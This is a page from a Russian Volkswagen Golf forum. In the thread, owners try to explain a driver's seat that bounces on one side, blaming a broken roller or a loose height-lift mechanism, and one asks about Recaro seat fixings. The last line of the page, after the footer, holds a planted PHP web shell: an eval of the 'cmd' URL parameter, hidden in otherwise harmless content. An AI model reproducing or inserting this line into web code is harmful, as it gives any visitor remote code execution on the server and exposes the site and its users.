+ Ответить в теме
Показано с 1 по 5 из 5

Тема: Сидение


  1. #1
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576

    Сидение

    Проблема в том что при проезжании лежачих и всяких там "волн" на асфальте сидение водительское подпрыгивает с левого (внутреннего) боку и я подпрыгиваю вместе с ним, что негативно сказывается на управлении и ощущениях..
    ни у кого такова не было? как лечитЬ?

  2. #2
    GTI-Racing Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Аватар для Pavlo
    Регистрация
    16.07.2009
    Откуда
    Москва
    Машина
    Mk4 GTI '99, Passat CC DSG '11
    Сообщений
    1,073
    Цитата Сообщение от Grisha Посмотреть сообщение
    Проблема в том что при проезжании лежачих и всяких там "волн" на асфальте сидение водительское подпрыгивает с левого (внутреннего) боку и я подпрыгиваю вместе с ним, что негативно сказывается на управлении и ощущениях..
    ни у кого такова не было? как лечитЬ?
    Если 3 двери то скорей всего развалился пластиковый ролик на крепеже
    Golf IV GTI AGU Koni Sport Coils -40mm + KYB AGX; Borla Muffler Attack Sound; NeuSpeed Pulley Kit; Samco Cooling Kit; ACT Flywheels; Hotchkis Sway Bar; WhiteLine Front & Rear Busching; TD05HR 16G Turbo; Eagle H-Beam + JE Piston 8,5;
    Passat CC 1,8 TSI APRStage 1/2 Testpipe - Продано

  3. #3
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    нет, дверей у меня 5! и самое интересное, что я ощупал весь низ, в облати роликов по которым сидушка ездит вперед/назад и там она нигде вообще не люфтит!
    а люфт идет от места крепления сидушки и лифта.. откуда-то оттуда

  4. #4
    GTI-Racing Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Аватар для Pavlo
    Регистрация
    16.07.2009
    Откуда
    Москва
    Машина
    Mk4 GTI '99, Passat CC DSG '11
    Сообщений
    1,073
    Цитата Сообщение от Grisha Посмотреть сообщение
    нет, дверей у меня 5! и самое интересное, что я ощупал весь низ, в облати роликов по которым сидушка ездит вперед/назад и там она нигде вообще не люфтит!
    а люфт идет от места крепления сидушки и лифта.. откуда-то оттуда
    Там только если сам механизм лифта люфтит, больше теоритически неоткуда
    Golf IV GTI AGU Koni Sport Coils -40mm + KYB AGX; Borla Muffler Attack Sound; NeuSpeed Pulley Kit; Samco Cooling Kit; ACT Flywheels; Hotchkis Sway Bar; WhiteLine Front & Rear Busching; TD05HR 16G Turbo; Eagle H-Beam + JE Piston 8,5;
    Passat CC 1,8 TSI APRStage 1/2 Testpipe - Продано

  5. #5
    GTI-Racing vanz is on a distinguished road Аватар для vanz
    Регистрация
    02.12.2008
    Машина
    Golf IV 1,8t AGU
    Сообщений
    256
    Никто не запаривался разбирать сидушки Recaro на Гольфе 4??? у меня нижняя боковая виксация сломалась каким то чудесным образом, в инете не могу найти что к чему там

+ Ответить в теме

Похожие темы

  1. Аирбег в пассажирском сидение.
    от NikitaFisher в разделе Электрика
    Ответов: 8
    Последнее сообщение: 09.04.2011, 09:53
  2. б**дское сидение
    от white GTI в разделе Кузов
    Ответов: 2
    Последнее сообщение: 22.10.2009, 13:31

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}